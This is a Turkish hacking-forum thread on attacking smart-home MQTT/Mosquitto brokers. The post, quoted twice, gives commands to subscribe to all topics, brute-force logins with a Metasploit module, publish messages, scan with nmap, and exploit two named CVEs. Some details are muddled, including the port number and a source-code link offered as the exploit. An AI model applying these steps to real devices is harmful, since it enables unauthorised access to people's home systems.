Akıllı Ev Sistemleri Hackleme

xRexieXX

Üye
3 Ara 2022
74
10
Merhabalar biraz özensiz yazıcağım kb. ama işinize yaricaktır

İLK ÖNCE AKILLI EV SİSTEMLERİ 18883 / TCP MOSQUİTTO / MQTT GİBİ PROTOKOLLERİ KULLANIR VE BUNLAR AĞLARA BAĞLIDIR

EĞER GÜVENLİKSİZ İSE ŞU KOMUTLAR İLE HACKLEYEBİLİRSİNİZ

mosquitto_sub -t '#' -h 127.0.0.1 -v



brute force attack için

me-tasploit

search mqtt_connect

bir tane çıkıcaktır o yüzden use 0 demeniz yeterlidir

gerekli yerleri set USER_FILE SET PASS_FILE SET RHOSTS gibi yerleri tamamladıktan sonra run diyoruz ve başlıyor şifre
bulununca

mosquitto_sub -h 127.0.0.1 -t '#' -v -u kullanıcıadı -P şifresi

ekrana bişey yazdırmak için ise

mosquitto_pub -h 127.0.0.1 -t '$TEST' -m "message"


Peki Genellikle hangi CVE lerde olurlar??

CVE-2018-12543

bu cve var ise

mosquitto_pub -h 127.0.0.1 -t '$TEST' -m "message"

bunu yazabilirsiniz

CVE-2017-7651


bu varsa

https://mosquitto.org/files/source/mosquitto-1.4.14.tar.gz
linkten indirebilirsiniz ./mqttexploit yazarsanız çalışıcaktır (dosya yoksa veya çalışmazsa ilk nano yapıp target IP gib yerlere IP yi yazın dosya yoksa kb :( )

NMAP İLE NASIL TARİCAĞIM?

nmap -sV -sC -p- -v 127.0.0.1
buyrunn

Peki MQTT nasıl çalışır?

O nasıl çalışır?​

MQTT (Message Queuing Telemetry Transport), yayınlama/abone olma mesajlaşma modelini kullanan hafif bir makineden makineye (M2M) protokolüdür.

MQTT'de bir yayıncı bir konu hakkında mesajlar yayınlar ve bir abonenin mesajı görebilmesi için o konuya abone olması gerekir. Mesajlar bir konuyla ilgili bir komisyoncuya yayınlanır. Bir MQTT aracısının işi, iletileri konuya göre filtrelemek ve ardından bunları abonelere dağıtmaktır .

türkçe çevirdim kb.

Devamı gelsin diyorsanız yazabillirsiniz yanlışım olabilir kb. İyi forumlarr <33
 
Merhabalar biraz özensiz yazıcağım kb. ama işinize yaricaktır

İLK ÖNCE AKILLI EV SİSTEMLERİ 18883 / TCP MOSQUİTTO / MQTT GİBİ PROTOKOLLERİ KULLANIR VE BUNLAR AĞLARA BAĞLIDIR

EĞER GÜVENLİKSİZ İSE ŞU KOMUTLAR İLE HACKLEYEBİLİRSİNİZ

mosquitto_sub -t '#' -h 127.0.0.1 -v



brute force attack için

me-tasploit

search mqtt_connect

bir tane çıkıcaktır o yüzden use 0 demeniz yeterlidir

gerekli yerleri set USER_FILE SET PASS_FILE SET RHOSTS gibi yerleri tamamladıktan sonra run diyoruz ve başlıyor şifre
bulununca

mosquitto_sub -h 127.0.0.1 -t '#' -v -u kullanıcıadı -P şifresi

ekrana bişey yazdırmak için ise

mosquitto_pub -h 127.0.0.1 -t '$TEST' -m "message"


Peki Genellikle hangi CVE lerde olurlar??

CVE-2018-12543

bu cve var ise

mosquitto_pub -h 127.0.0.1 -t '$TEST' -m "message"

bunu yazabilirsiniz

CVE-2017-7651


bu varsa

https://mosquitto.org/files/source/mosquitto-1.4.14.tar.gz
linkten indirebilirsiniz ./mqttexploit yazarsanız çalışıcaktır (dosya yoksa veya çalışmazsa ilk nano yapıp target IP gib yerlere IP yi yazın dosya yoksa kb :( )

NMAP İLE NASIL TARİCAĞIM?

nmap -sV -sC -p- -v 127.0.0.1
buyrunn

Peki MQTT nasıl çalışır?

O nasıl çalışır?​

MQTT (Message Queuing Telemetry Transport), yayınlama/abone olma mesajlaşma modelini kullanan hafif bir makineden makineye (M2M) protokolüdür.

MQTT'de bir yayıncı bir konu hakkında mesajlar yayınlar ve bir abonenin mesajı görebilmesi için o konuya abone olması gerekir. Mesajlar bir konuyla ilgili bir komisyoncuya yayınlanır. Bir MQTT aracısının işi, iletileri konuya göre filtrelemek ve ardından bunları abonelere dağıtmaktır .

türkçe çevirdim kb.

Devamı gelsin diyorsanız yazabillirsiniz yanlışım olabilir kb. İyi forumlarr <33
Selamlar xRexieXX neden düzensiz yazıcağım dedin😣.Forum içersindeki diğer üyelerimize düzenli şekilde konularımızı açmamız gerekiyor.1 kafa karışıklı başka soru işaretlerine sebeb olur dimi 😊.Öz sade düzenli olsun kolay gelsin.
 

alexandre20

Katılımcı Üye
13 Tem 2022
939
737
yapabilmek için aynı ağa bağlı olmak gerekiyor. Aynı ağa bağlıysan zaten fiziksel erişim de muhtemelen var demektir. faydasız konu gerçek hayat senaryosu yok gibi bişey
 

xRexieXX

Üye
3 Ara 2022
74
10
Selamlar xRexieXX neden düzensiz yazıcağım dedin😣.Forum içersindeki diğer üyelerimize düzenli şekilde konularımızı açmamız gerekiyor.1 kafa karışıklı başka soru işaretlerine sebeb olur dimi 😊.Öz sade düzenli olsun kolay gelsin.
çok vaktim yoktu onu belirtdim

yapabilmek için aynı ağa bağlı olmak gerekiyor. Aynı ağa bağlıysan zaten fiziksel erişim de muhtemelen var demektir. faydasız konu gerçek hayat senaryosu yok gibi bişey
hayır uzaktan connection etmeyi anlattım ben yani 1883 portunu manipüle etmeyi
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.